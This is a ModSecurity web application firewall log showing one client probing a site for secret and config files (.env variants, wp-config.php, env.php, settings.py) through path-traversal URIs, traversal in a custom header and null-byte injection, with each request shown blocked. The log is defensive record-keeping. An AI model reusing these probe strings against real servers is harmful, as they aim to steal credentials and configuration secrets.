[Tue May 12 04:39:32.507579 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.507634 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.507661 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.507689 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.508316 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 16)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.578274 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WgAAAUQ"], referer: https://tchatbooster.com/assets../../wp-config.php
[Tue May 12 04:39:32.606636 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WwAAAVE"]
[Tue May 12 04:39:32.606849 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WwAAAVE"]
[Tue May 12 04:39:32.669278 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5M1tk6y7yBJLpJopywAAAIU"]
[Tue May 12 04:39:32.689164 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS5Due9Sp-pIv_Bb61XAAAAUQ"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:32.689399 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS5Due9Sp-pIv_Bb61XAAAAUQ"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:32.989419 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 16 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5M1tk6y7yBJLpJopzAAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:33.014826 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.014873 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.014925 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.015134 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.015181 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.015219 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.015627 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.070649 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WwAAAVE"]
[Tue May 12 04:39:33.181498 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Due9Sp-pIv_Bb61XAAAAUQ"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:33.210516 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS5Tue9Sp-pIv_Bb61XQAAAVE"]
[Tue May 12 04:39:33.210758 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS5Tue9Sp-pIv_Bb61XQAAAVE"]
[Tue May 12 04:39:33.470382 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5c1tk6y7yBJLpJopzwAAAIU"]
[Tue May 12 04:39:33.495409 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495461 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495490 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495519 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495734 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495791 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.495826 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.496270 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:33.596876 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS5c1tk6y7yBJLpJop0QAAAIU"]
[Tue May 12 04:39:33.597100 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS5c1tk6y7yBJLpJop0QAAAIU"]
[Tue May 12 04:39:33.687473 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Tue9Sp-pIv_Bb61XQAAAVE"]
